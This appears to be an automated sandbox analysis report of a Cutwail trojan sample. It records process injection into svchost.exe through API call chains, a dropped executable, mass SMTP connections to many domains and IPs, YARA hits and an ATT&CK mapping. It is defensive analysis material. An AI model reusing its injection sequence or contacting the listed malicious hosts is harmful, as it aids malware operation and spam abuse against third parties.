                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.235.32 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: a-domani.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettlinx.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.50.65.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: softizer.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 176.119.200.128 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rokoron.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.250.32.94 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbp-jp.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: doggybag.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.175.217.57 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.197.121.220 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.72.176.26 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: htsmx.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.156.237 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dwid.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.181 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: skypearl.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludea.cz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.96.3 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.79.248.38 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: esmoke.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 78san.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.150.50 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.200.235.135 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: agulatex.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gcss.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 64.18.191.61 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.161.192 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.178.208.141 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.66.220 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.111.4.70 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.111.4.71 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.130.4.196 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: leapc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: magicomm.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nolaoig.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.106.129.180 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.64.147.213 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mkm-gr.com
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B21008Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2D98008Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 28E8008Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EDB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7E670000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7E520000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_040020B0 GetEnvironmentVariableA,lstrcatA,lstrcatA,lstrcatA,VirtualAlloc,CreateProcessA,VirtualFree,VirtualAllocEx,VirtualAllocEx,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,VirtualFree,GetThreadContext,TerminateProcess,CloseHandle,CloseHandle,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,0_2_040020B0
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04002510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,0_2_04002510
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04002510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,2_2_04002510
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04002510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,6_2_04002510
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_04001DC0 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,10_2_04001DC0
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04007250 wsprintfA,RegOpenKeyExA,RegQueryValueExA,GetLocalTime,RegCloseKey,0_2_04007250
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04008F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,0_2_04008F80

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.4000000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.10004088.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.10004088.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.2260000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.2261e88.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.2260000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.7e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.10004088.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.2380000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.4000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.4000000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.2261e88.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.7e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.10004088.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.10004088.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.2381e88.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.7e1e88.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.pigalicapi.exe.7e1e88.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.4000000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.2380000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.pigalicapi.exe.10004088.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.iJzpyjAehB.exe.2381e88.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.608690490.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.607161240.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.567367147.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.607986528.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.567130920.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.571934007.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts3
                      Native API
                      1
                      Windows Service
                      1
                      Windows Service
                      111
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      Exfiltration Over Other Network Medium21
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default AccountsScheduled Task/Job1
                      Registry Run Keys / Startup Folder
                      611
                      Process Injection
                      21
                      Virtualization/Sandbox Evasion
                      LSASS Memory221
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)1
                      Registry Run Keys / Startup Folder
                      611
                      Process Injection
                      Security Account Manager21
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Obfuscated Files or Information
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer25
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Software Packing
                      LSA Secrets1
                      Application Window Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                      Remote System Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem15
                      System Information Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 823805 Sample: iJzpyjAehB.exe Startdate: 10/03/2023 Architecture: WINDOWS Score: 100 63 yoruksut.com 2->63 65 ymlp15.net 2->65 67 332 other IPs or domains 2->67 107 Snort IDS alert for network traffic 2->107 109 Antivirus detection for URL or domain 2->109 111 Multi AV Scanner detection for submitted file 2->111 117 2 other signatures 2->117 8 iJzpyjAehB.exe 3 68 2->8         started        13 pigalicapi.exe 48 2->13         started        15 pigalicapi.exe 49 2->15         started        signatures3 113 Tries to resolve many domain names, but no domain seems valid 63->113 115 System process connects to network (likely due to code injection or exploit) 65->115 process4 dnsIp5 69 www.ftchat.com 8->69 71 kavram.com 8->71 77 174 other IPs or domains 8->77 45 C:\Users\user\pigalicapi.exe, PE32 8->45 dropped 47 C:\Users\...\pigalicapi.exe:Zone.Identifier, ASCII 8->47 dropped 119 Contains functionality to inject threads in other processes 8->119 121 Drops PE files to the user root directory 8->121 123 Contains functionality to inject code into remote processes 8->123 125 Contains functionality to compare user and computer (likely to detect sandboxes) 8->125 17 svchost.exe 8->17         started        73 www.jacomfg.com 13->73 79 163 other IPs or domains 13->79 127 Multi AV Scanner detection for dropped file 13->127 129 Writes to foreign memory regions 13->129 131 Allocates memory in foreign processes 13->131 21 svchost.exe 13->21         started        75 uhsa.edu.ag 15->75 81 154 other IPs or domains 15->81 133 Injects a PE file into a foreign processes 15->133 23 svchost.exe 15->23         started        file6 135 System process connects to network (likely due to code injection or exploit) 75->135 signatures7 process8 dnsIp9 49 mail.airmail.net 66.226.70.66 INFB2-ASUS United States 17->49 57 3 other IPs or domains 17->57 25 svchost.exe 12 17->25         started        29 svchost.exe 17->29         started        31 svchost.exe 17->31         started        33 svchost.exe 17->33         started        51 smtp1.sbc.mail.am0.yahoodns.net 21->51 59 6 other IPs or domains 21->59 101 System process connects to network (likely due to code injection or exploit) 21->101 103 Contains functionality to inject threads in other processes 21->103 105 Injects a PE file into a foreign processes 21->105 43 4 other processes 21->43 53 yasuma.com 23->53 55 smtp1.sbc.mail.am0.yahoodns.net 23->55 61 2 other IPs or domains 23->61 35 svchost.exe 23->35         started        37 svchost.exe 23->37         started        39 svchost.exe 23->39         started        41 svchost.exe 23->41         started        signatures10 process11 dnsIp12 83 62 other IPs or domains 25->83 137 System process connects to network (likely due to code injection or exploit) 25->137 85 120 other IPs or domains 29->85 87 73 other IPs or domains 31->87 89 150 other IPs or domains 33->89 91 76 other IPs or domains 35->91 93 27 other IPs or domains 37->93 95 22 other IPs or domains 39->95 97 62 other IPs or domains 41->97 99 112 other IPs or domains 43->99 signatures13

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      iJzpyjAehB.exe52%ReversingLabsWin32.Trojan.Cutwail
                      iJzpyjAehB.exe24%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      C:\Users\user\pigalicapi.exe52%ReversingLabsWin32.Trojan.Cutwail
                      SourceDetectionScannerLabelLinkDownload
                      10.2.svchost.exe.4004000.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.iJzpyjAehB.exe.3520000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.3.svchost.exe.6c00000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.3.iJzpyjAehB.exe.23b0000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.iJzpyjAehB.exe.10004088.12.unpack100%AviraTR/Patched.Ren.GenDownload File
                      11.2.svchost.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.pigalicapi.exe.2390000.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.3.pigalicapi.exe.30d0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      10.3.svchost.exe.54a0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      2.2.pigalicapi.exe.4000000.9.unpack100%AviraTR/Spy.GenDownload File
                      2.3.pigalicapi.exe.23e0000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                      12.2.svchost.exe.4004000.5.unpack100%AviraTR/Patched.Ren.GenDownload File
                      12.3.svchost.exe.3be0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      6.2.pigalicapi.exe.2260000.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.2.pigalicapi.exe.7ee118.2.unpack100%AviraTR/Downloader.GenDownload File
                      6.3.pigalicapi.exe.3170000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.3.svchost.exe.54a0000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                      19.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      2.2.pigalicapi.exe.10004088.11.unpack100%AviraTR/Patched.Ren.GenDownload File
                      11.2.svchost.exe.4004000.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      12.3.svchost.exe.54a0000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      10.2.svchost.exe.4036a00.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.iJzpyjAehB.exe.10010318.11.unpack100%AviraTR/Downloader.GenDownload File
                      12.2.svchost.exe.4036a00.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      26.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      6.2.pigalicapi.exe.10010318.10.unpack100%AviraTR/Downloader.GenDownload File
                      11.3.svchost.exe.2df0000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      23.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      12.3.svchost.exe.3be0000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      12.2.svchost.exe.4000000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.3.svchost.exe.2df0000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      2.2.pigalicapi.exe.7e0000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      12.3.svchost.exe.55a0000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.3.pigalicapi.exe.23c0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      10.3.svchost.exe.5720000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      12.2.svchost.exe.4050e00.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                      11.2.svchost.exe.4000000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.3.iJzpyjAehB.exe.af0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.pigalicapi.exe.10010318.12.unpack100%AviraTR/Downloader.GenDownload File
                      11.2.svchost.exe.4050e00.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.iJzpyjAehB.exe.b10000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.3.svchost.exe.6c00000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.svchost.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.iJzpyjAehB.exe.23b0000.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      26.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      0.2.iJzpyjAehB.exe.238e118.5.unpack100%AviraTR/Downloader.GenDownload File
                      24.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      6.2.pigalicapi.exe.226e118.2.unpack100%AviraTR/Downloader.GenDownload File
                      14.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      12.3.svchost.exe.54a0000.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                      11.3.svchost.exe.2de0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      18.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      11.2.svchost.exe.4036a00.5.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.iJzpyjAehB.exe.4000000.9.unpack100%AviraTR/Spy.GenDownload File
                      6.3.pigalicapi.exe.2390000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                      19.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      16.2.svchost.exe.7e520000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                      6.3.pigalicapi.exe.31a0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      10.2.svchost.exe.406b200.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      24.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      21.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      6.2.pigalicapi.exe.400e290.8.unpack100%AviraTR/Downloader.GenDownload File
                      11.3.svchost.exe.6c00000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.pigalicapi.exe.2261e88.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.3.iJzpyjAehB.exe.ac0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.3.pigalicapi.exe.2280000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.2.pigalicapi.exe.30d0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.2.svchost.exe.7edb0000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                      25.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      12.3.svchost.exe.27f0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      21.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      2.2.pigalicapi.exe.23e0000.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      18.2.svchost.exe.13140000.1.unpack100%AviraTR/Proxy.GenDownload File
                      22.2.svchost.exe.4000000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                      10.2.svchost.exe.4050e00.2.unpack100%AviraTR/Patched.Ren.GenDownload File
